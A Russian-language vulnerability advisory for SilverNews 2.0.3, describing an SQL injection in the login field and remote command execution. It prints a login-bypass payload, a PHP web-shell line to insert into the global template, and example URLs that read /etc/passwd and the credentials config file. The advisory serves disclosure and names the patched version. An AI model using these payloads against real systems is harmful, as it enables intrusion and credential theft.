Security Lab

SQL-инъекция и удаленное выполнение команд в SilverNews

Дата публикации:05.08.2005
Дата изменения:27.02.2009
Всего просмотров:1206
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SilverNews 2.x
Уязвимые версии: SilverNews 2.0.3

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и произвольные системные команды на целевом сервере.

Уязвимость существует из-за недостаточной обработки входных данных в переменной user при выключенной опции magic_quotes. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе. Пример:

user: ' or isnull(1/0) /*
pass: whatever
Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'. Пример:
//***********************************************
</body>
</html>

TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);
И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. Примеры:
http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= 
cat%20/etc/passwd

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=
cat%20/[path_to_config_file]/data.inc.php

URL производителя:
www.silver-scripts.de/scripts.php?l=en&script=SilverNews

Решение: Установите последнюю версию 2.0.4 с сайта производителя.

Журнал изменений:

27.02.2009
Изменена секция «Решение».

Ссылки: SilverNews Input Validation Holes Let Remote Users Inject SQL Commands and Remote Authenticated Users Execute System Commands

http://www.rgod.altervista.org/silvernews.html